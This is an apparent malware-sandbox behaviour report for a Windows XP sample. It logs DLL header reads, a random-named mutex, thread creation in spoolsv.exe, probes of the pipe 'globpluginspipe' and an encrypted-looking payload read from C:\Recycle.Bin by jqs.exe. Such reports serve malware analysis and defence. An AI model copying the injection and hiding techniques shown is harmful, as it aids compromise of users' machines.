File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326278617
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326279092
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326279410
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326280389
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326281561
System info queried Type: BasicInformation success or wait 2326282397
System info queried Type: ProcessorInformation success or wait 2326282698
System info queried Type: BasicInformation success or wait 2326970834
System info queried Type: ProcessorInformation success or wait 2326971130
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326975159
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326976282
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326977011
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326977325
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326978199
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326979073
System info queried Type: BasicInformation success or wait 2326979915
System info queried Type: ProcessorInformation success or wait 2326980215
System info queried Type: BasicInformation success or wait 2326983018
System info queried Type: ProcessorInformation success or wait 2326983313
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326983728
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326984719
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326985385
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326985699
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326986574
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326987449
System info queried Type: BasicInformation success or wait 2326988275
System info queried Type: ProcessorInformation success or wait 2326988573
System info queried Type: BasicInformation success or wait 2326991257
System info queried Type: ProcessorInformation success or wait 2326991550
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326991962
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326992538
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326992777
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326992890
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326993205
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326993521
System info queried Type: BasicInformation success or wait 2326993819
System info queried Type: ProcessorInformation success or wait 2326993928
System info queried Type: BasicInformation success or wait 2326995012
System info queried Type: ProcessorInformation success or wait 2326995327
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326995741
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326997261
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326997924
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326998239
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326999114
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326999990
System info queried Type: BasicInformation success or wait 2327000811
System info queried Type: ProcessorInformation success or wait 2327001112
System info queried Type: BasicInformation success or wait 2327003830
System info queried Type: ProcessorInformation success or wait 2327004123
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327004538
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2327005650
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2327006313
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2327006628
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2327007502
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2327008378
System info queried Type: BasicInformation success or wait 2327009195
System info queried Type: ProcessorInformation success or wait 2327009495
System info queried Type: BasicInformation success or wait 2327012310
System info queried Type: ProcessorInformation success or wait 2327012627
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327013042
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2327014172
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2327014848
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2327015168
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2327016050
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2327016932
System info queried Type: BasicInformation success or wait 2327017773
System info queried Type: ProcessorInformation success or wait 2327018113
System info queried Type: BasicInformation success or wait 2327020456
System info queried Type: ProcessorInformation success or wait 2327020754
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327021207
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2327022417
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2327023141
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2327023464
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2327024539
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2327025493
System info queried Type: BasicInformation success or wait 2327026373
System info queried Type: ProcessorInformation success or wait 2327026717
System info queried Type: BasicInformation success or wait 2327029586
System info queried Type: ProcessorInformation success or wait 2327029880
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2327030296
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2327031480
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2327032295
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2327032614
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2327033772
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2327034675
System info queried Type: BasicInformation success or wait 2327035520
System info queried Type: ProcessorInformation success or wait 2327035820
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2327038041
Thread created PID: 1496 TID: 3428 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2327039749
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2327057090
Thread delayed Time: 0 TID: 13312 success or wait 2327209775
Thread delayed Time: 0 TID: 13312 success or wait 2327264651
Thread delayed Time: 0 TID: 13312 success or wait 2327265142
Thread delayed Time: 0 TID: 13312 success or wait 2328327305
Thread delayed Time: 0 TID: 13312 success or wait 2328382888
Thread delayed Time: 0 TID: 13312 success or wait 2328383061
Thread delayed Time: 0 TID: 13312 success or wait 2329445828
Thread delayed Time: 0 TID: 13312 success or wait 2329504006
Thread delayed Time: 0 TID: 13312 success or wait 2329504178
Thread delayed Time: 0 TID: 13312 success or wait 2330565604
Thread delayed Time: 0 TID: 13312 success or wait 2330623626
Thread delayed Time: 0 TID: 13312 success or wait 2330624130
Thread delayed Time: 0 TID: 13312 success or wait 2331684321
Thread delayed Time: 0 TID: 13312 success or wait 2331739052
Thread delayed Time: 0 TID: 13312 success or wait 2331739586
Thread delayed Time: 0 TID: 13312 success or wait 2332802906
Thread delayed Time: 0 TID: 13312 success or wait 2332857671
Thread delayed Time: 0 TID: 13312 success or wait 2332858182
Thread delayed Time: 0 TID: 13312 success or wait 2333921462
Thread delayed Time: 0 TID: 13312 success or wait 2333979290
Thread delayed Time: 0 TID: 13312 success or wait 2333979804
Thread delayed Time: 0 TID: 13312 success or wait 2335042745
Thread delayed Time: 0 TID: 13312 success or wait 2335094861
Thread delayed Time: 0 TID: 13312 success or wait 2335095368
Thread delayed Time: 0 TID: 13312 success or wait 2336158694
Thread delayed Time: 0 TID: 13312 success or wait 2336213482
Thread delayed Time: 0 TID: 13312 success or wait 2336213999
Thread delayed Time: 0 TID: 13312 success or wait 2337276893
Thread delayed Time: 0 TID: 13312 success or wait 2337331739
Thread delayed Time: 0 TID: 13312 success or wait 2337332240
Thread delayed Time: 0 TID: 13312 success or wait 2338398897
Thread delayed Time: 0 TID: 13312 success or wait 2338450325
Thread delayed Time: 0 TID: 13312 success or wait 2338450824
Thread delayed Time: 0 TID: 13312 success or wait 2339514594
Thread delayed Time: 0 TID: 13312 success or wait 2339571958
Thread delayed Time: 0 TID: 13312 success or wait 2339572471
Thread delayed Time: 0 TID: 13312 success or wait 2340631988
Thread delayed Time: 0 TID: 13312 success or wait 2340687546
Thread delayed Time: 0 TID: 13312 success or wait 2340687722
Thread delayed Time: 0 TID: 13312 success or wait 2341750610
Thread delayed Time: 0 TID: 13312 success or wait 2341806182
Thread delayed Time: 0 TID: 13312 success or wait 2341806359
Thread delayed Time: 0 TID: 13312 success or wait 2342870572
Thread delayed Time: 0 TID: 13312 success or wait 2342928663
Thread delayed Time: 0 TID: 13312 success or wait 2342929170
Thread delayed Time: 0 TID: 13312 success or wait 2343988895
Thread delayed Time: 0 TID: 13312 success or wait 2344043784
Analysis File: ctfmon.exe PID: 1828 Parent PID: 1636
Sections
+ General
Start time: 05:48:11
Start date: 01/12/2011
Path: C:\WINDOWS\system32\ctfmon.exe
Commandline: C:\WINDOWS\system32\ctfmon.exe
Imagebase: 0x400000
File size: 15360 bytes
MD5 hash: 5F1D5F88303D4A4DBC8E5F97BA967CC3
Chronological sections
Operation Data Completion Time
Analysis File: svchost.exe PID: 448 Parent PID: 1636
Sections
+ General
Start time: 05:48:11
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k LocalService
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
Chronological sections
Operation Data Completion Time
Analysis File: jqs.exe PID: 508 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:12
Start date: 01/12/2011
Path: C:\Program Files\Java\jre6\bin\jqs.exe
Commandline: C:\Program Files\Java\jre6\bin\jqs.exe -service -config C:\Program Files\Java\jre6\lib\deploy\jqs\jqs.conf
Imagebase: 0x400000
File size: 153376 bytes
MD5 hash: 5E06A9D23727DAF96FAA796F1135FDCD
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 3 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
C:\Program Files\Java\jre6\bin\client\classes.jsa query and read commit 11B0000 13369344 own pid readonly success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 22A0000 77824 own pid readonly object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\awt.dll write and read and execute commit 10B0000 1208320 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\awt.dll query and write and read and execute image 6D000000 1351680 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D000000 1351680 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\client\jvm.dll write and read and execute commit 10B0000 2695168 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\client\jvm.dll query and write and read and execute image 6D7F0000 2777088 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D7F0000 2777088 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\dcpr.dll write and read and execute commit 10B0000 143360 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\dcpr.dll query and write and read and execute image 6D1A0000 143360 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D1A0000 143360 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\deploy.dll write and read and execute commit 10B0000 77824 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\deploy.dll query and write and read and execute image 6D1D0000 77824 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D1D0000 77824 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\fontmanager.dll write and read and execute commit 10B0000 323584 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\fontmanager.dll query and write and read and execute image 6D230000 323584 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D230000 323584 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\hpi.dll write and read and execute commit 10B0000 16384 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\hpi.dll query and write and read and execute image 6D280000 32768 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D280000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\java.dll write and read and execute commit 10B0000 126976 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\java.dll query and write and read and execute image 6D320000 126976 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D320000 126976 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe write and read and execute commit 10B0000 147456 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\javaw.exe query and write and read and execute image 10B0000 147456 own pid read write conflicting addresses 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 10B0000 147456 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll write and read and execute commit 10B0000 8192 own pid execute success or wait 1
C:\Program Files\Java\jre6\bin\jp2native.dll query and write and read and execute image 6D420000 24576 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 6D420000 24576 own pid read write object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\SETUPAPI.DLL write and read and execute unknown 77920000 995328 own pid read write object name not found 1
